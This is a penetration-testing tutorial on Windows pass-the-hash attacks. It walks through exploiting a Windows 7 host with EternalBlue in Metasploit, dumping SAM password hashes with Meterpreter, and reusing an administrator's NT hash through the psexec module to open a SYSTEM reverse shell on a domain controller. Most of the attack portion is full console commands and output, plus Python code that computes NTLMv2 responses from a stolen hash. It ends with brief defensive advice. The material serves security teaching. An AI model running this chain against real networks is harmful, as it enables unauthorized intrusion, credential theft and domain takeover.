Windows passwords are stored as hashes, and those hashes are sometimes hard to crack. In certain situations, however, we can sidestep cracking altogether by using the hash as it is, without ever learning the plaintext password. Retrieving the hash of an administrative user is especially interesting, because we can then authenticate with that user's privileges by performing an attack called pass-the-hash.
We will first compromise a Windows 7 box and dump the password hashes from it. For the attack to work, the account whose hash we obtain must also be an administrator on the second machine: either a domain account, or a local account with the same username and password (and therefore the same hash) on both computers. We will use Kali Linux as our attack box.
Pass-the-Hash Overview
To understand the pass-the-hash technique, we first need to explain what the hash consists of. In Windows, a typical hash looks like this:
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
There are four fields separated by colons (the trailing colons are empty fields that hashdump always prints). The first field is the username and the second is the relative identifier (RID): 500 is the built-in Administrator, 501 is Guest, and accounts created later get 1000 and up.
The third field is the LM hash, a legacy hash used on older Windows systems; storing it has been disabled by default since Vista / Server 2008. You will not see real LM hashes often, but they still turn up where older systems remain in use or the default was changed. If you find one, you are lucky, because LM hashes are trivial to crack. The value aad3b435b51404eeaad3b435b51404ee shown above is the LM hash of an empty string and simply means that no LM hash is stored for the account.
The fourth field is the NT hash, often called the NTLM hash or NTHash. It is the MD4 digest of the UTF-16LE encoded password, it is what modern Windows systems store, and it is much harder to crack than LM (it is still unsalted, so a wordlist attack is worth a try). This is the value we use to pass the hash.
Our attack works because of the way passwords are stored, transmitted, and used for authentication. Your password is never sent over the network in plain text: it is hashed from the moment it is set, and it is the hash that is stored and used in the NTLM exchange.
When you authenticate with a username and password, the password is hashed as soon as you type it; from that point on the NTLM authentication code only ever works with the hash, so the hash is the effective credential. By supplying the hash directly to the authentication mechanism, we avoid any need to know the plaintext password.
This is what makes the technique so useful: as long as we know the username and the NT hash of an administrative account, we can authenticate as that administrator.
Step 1: Get the hash from the original target
First, we must compromise the original target. In this scenario it is an ordinary workstation (our Windows 7 computer). Any method will do, but here we assume the machine is vulnerable to EternalBlue (MS17-010).
~# msfconsole
msf5 >
Then we run the EternalBlue module. For more information about this module, see my earlier guide on using EternalBlue against a Windows server.
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1234
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1234 -> 10.10.0.104:49210) at 2019-04-08 10:29:38 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
Meterpreter has a useful command called hashdump that reads the local SAM and prints the LM and NT hashes of every local account.
meterpreter > hashdump
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
There is a user named admin2 (RID 1000) who, judging by the name, probably has administrator privileges. Note that the built-in Administrator and Guest accounts both carry 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password, which usually means the accounts are disabled, so admin2 is the one worth taking. We can copy its hash and use it to authenticate to another computer.
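To make the hash format and the reasoning in the overview concrete, here is an added example (not code from the original tutorial or from Metasploit). It parses the three hashdump lines above, derives NT hashes the way Windows does (MD4 over the UTF-16LE password, implemented in pure Python because hashlib's md4 is missing on many OpenSSL 3 builds), and then computes an NTLMv2 challenge response per MS-NLMP using nothing but the NT hash, which is exactly why passing the hash works. The server challenge, client challenge and empty target info are constructed values for the demo, not captured traffic.

```python
"""Added example: parse hashdump output, derive NT hashes, and answer an
NTLMv2 challenge from the NT hash alone (no plaintext password needed)."""
import hashlib
import hmac
import struct

_M = 0xFFFFFFFF


def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE encoded password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        h = state[:]
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                r = (-i) % 4  # register updated in this step: a, d, c, b, a, ...
                x, y, z = h[(r + 1) % 4], h[(r + 2) % 4], h[(r + 3) % 4]
                h[r] = _rot((h[r] + f(x, y, z) + X[idx] + k) & _M, shifts[i % 4])
        state = [(s + v) & _M for s, v in zip(state, h)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """The NT hash (NTHash, 'NTLM hash'): unsalted MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash is stored
EMPTY_NT = nt_hash("")                          # 31d6cfe0...: the account has a blank password


def parse_hashdump(text: str) -> list:
    """Parse user:rid:lm:nt::: lines as printed by Meterpreter's hashdump."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.strip().split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        out.append({
            "user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_stored": lm != EMPTY_LM,       # a real LM hash: trivially crackable
            "blank_password": nt == EMPTY_NT,  # usually a disabled built-in account
            "smbpass": f"{lm}:{nt}",           # LMHASH:NTHASH, the form psexec's SMBPass takes
        })
    return out


def build_blob(client_challenge: bytes, target_info: bytes = b"", timestamp: int = 0) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE ('temp') structure from MS-NLMP 2.2.2.7."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_proof(nt_hex: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP 3.3.2. The only secret input is the NT hash."""
    key = hmac.new(bytes.fromhex(nt_hex), (user.upper() + domain).encode("utf-16-le"),
                   hashlib.md5).digest()  # NTOWFv2
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def verify_ntlmv2(stored_nt_hex, user, domain, server_challenge, blob, proof) -> bool:
    """Server side: recompute from the stored hash and compare in constant time."""
    return hmac.compare_digest(proof, ntlmv2_proof(stored_nt_hex, user, domain, server_challenge, blob))


# Constructed sample input: the three hashdump lines shown in this tutorial.
SAMPLE_HASHDUMP = """\
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def demo():
    accounts = parse_hashdump(SAMPLE_HASHDUMP)
    admin2 = accounts[0]
    server_challenge = bytes.fromhex("0123456789abcdef")  # constructed
    blob = build_blob(bytes.fromhex("aaaaaaaaaaaaaaaa"))   # constructed client challenge
    # Attacker side: holds only admin2's hash from hashdump, never the password.
    proof = ntlmv2_proof(admin2["nt"], admin2["user"], "", server_challenge, blob)
    # Target side: checks against the same stored hash and accepts the logon.
    return accounts, proof, verify_ntlmv2(admin2["nt"], admin2["user"], "", server_challenge, blob, proof)


if __name__ == "__main__":
    accts, proof, accepted = demo()
    for a in accts:
        print(f'{a["user"]:<14} rid={a["rid"]:<5} lm_stored={a["lm_stored"]!s:<5} blank={a["blank_password"]}')
    print("NTProofStr computed from the hash alone:", proof.hex(), "accepted:", accepted)
```

Running it flags Administrator and Guest as blank-password accounts, confirms that no LM hashes are stored on the Windows 7 box, and shows the server accepting a challenge response that was built without the plaintext: the stored NT hash is the credential, so leaking it is equivalent to leaking the password for NTLM purposes.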
Let's say there is another computer on the network that looks like a server, possibly a domain controller (this is the Windows Server 2016 box). If we can get onto this computer, we effectively own the entire domain and every computer in it.
Step 2: Pass the hash with PsExec
Now that we have the hash of a privileged user, we can use it to authenticate to the Windows Server 2016 box without ever entering the plaintext password. We can do this with the Metasploit module exploit/windows/smb/psexec.
PsExec is a Sysinternals command-line tool for Windows that runs programs and commands on remote systems. It is useful for administrators because it redirects the console input and output of the remote program, so it works seamlessly with console applications and utilities. As always, there is a trade-off between convenience and security: the same mechanism (copy a service binary to an administrative share such as ADMIN$ and start it through the Service Control Manager) lets an attacker execute malicious commands or plant a backdoor.
Metasploit includes its own implementation of the PsExec technique that makes it easy to get a session on remote targets. Use the search command to locate the module:
msf5 > search psexec

Matching Modules
================

   #   Name                                         Disclosure Date  Rank       Check  Description
   -   ----                                         ---------------  ----       -----  -----------
   1   auxiliary/admin/smb/ms17_010_command         2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2   auxiliary/admin/smb/psexec_command                            normal     Yes    Microsoft Windows Authenticated Administration Utility
   3   auxiliary/admin/smb/psexec_ntdsgrab                           normal     No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   4   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal     Yes    DCOM Exec
   5   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal     Yes    WMI Exec
   6   auxiliary/scanner/smb/psexec_loggedin_users                   normal     Yes    Microsoft Windows Authenticated Logged In Users Enumeration
   7   encoder/x86/service                                           manual     No     Register Service
   8   exploit/windows/local/current_user_psexec    1999-01-01       excellent  No     PsExec via Current User Token
   9   exploit/windows/local/wmi                    1999-01-01       excellent  No     Windows Management Instrumentation (WMI) Remote Command Execution
   10  exploit/windows/smb/ms17_010_psexec          2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11  exploit/windows/smb/psexec                   1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
   12  exploit/windows/smb/psexec_psh               1999-01-01       manual     No     Microsoft Windows Authenticated Powershell Command Execution
   13  exploit/windows/smb/webexec                  2018-10-24       manual     No     WebExec Authenticated User Code Execution
It's an oldie, but a goodie. Load it with the use command.
msf5 > use exploit/windows/smb/psexec
Now we can display the current settings with the options command.

msf5 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$, C$, ...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as
Exploiting the target
First, we need to set the IP address of the target (the server we are now going after):
msf5 exploit(windows/smb/psexec) > set rhosts 10.10.0.100
rhosts => 10.10.0.100
Then we set the username, and for the password we supply the hash we obtained instead of a plaintext password. The module recognises the LMHASH:NTHASH format in SMBPass and performs pass-the-hash; if you only have an NT hash, prefix it with the empty LM hash aad3b435b51404eeaad3b435b51404ee so it is in that form.
msf5 exploit(windows/smb/psexec) > set smbuser admin2
smbuser => admin2
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7
smbpass => aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7
Next, set the payload (the target is a 64-bit server, so we use the x64 Meterpreter):
msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
And the IP address of our local machine and a desired port.
msf5 exploit(windows/smb/psexec) > set lhost 10.10.0.1
lhost => 10.10.0.1
msf5 exploit(windows/smb/psexec) > set lport 1234
lport => 1234
The remaining defaults are fine for now, so we can proceed. Launch the module with the run command.
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.0.1:1234
[*] 10.10.0.100:445 - Connecting to the server...
[*] 10.10.0.100:445 - Authenticating to 10.10.0.100:445 as user 'admin2'...
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[*] Sending stage (206403 bytes) to 10.10.0.100
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 2 opened (10.10.0.1:1234 -> 10.10.0.100:49864) at 2019-04-08 10:36:37 -0500

meterpreter >
And now we have a Meterpreter session. Commands such as getuid and sysinfo confirm who we are and what we have landed on.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC01
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : de_DE
Domain          : DLAB
Logged On Users : 4
Meterpreter     : x64/windows
Pretty neat. We did not need a password at all, just the hash, to get onto the server, and because the psexec module runs its payload as a service we land as NT AUTHORITY\SYSTEM on a domain controller. We own this system now.
Pass-the-hash is generally hard to defend against because on the wire it looks like any other NTLM authentication. The best approach is defense in depth, so that a single stolen hash does limited damage.
Keeping permissions to a minimum limits what an attacker can do once they gain an initial foothold on the network. Other standard defenses still apply: for example, a firewall and IDS/IPS to monitor for and block malicious activity, and in particular blocking SMB (TCP 445) between workstations, which pass-the-hash via PsExec relies on.
Windows can also be configured to limit credential caching and to restrict NTLM, so that fewer hashes are available to harvest and fewer places accept them. Above all, do not reuse one local administrator password across machines, since that reuse is exactly what lets a hash dumped from a workstation work on a server. Isolating sensitive systems on the network further limits an attacker's ability to pivot.
In this tutorial we looked at how Windows stores password hashes, how they are used in authentication, and how that can be abused in a pass-the-hash attack. After compromising a low-value target we dumped its hashes and found an administrative account. From there, we used Metasploit to pass the hash and ultimately obtained SYSTEM on a server. If you have any questions, please leave them below.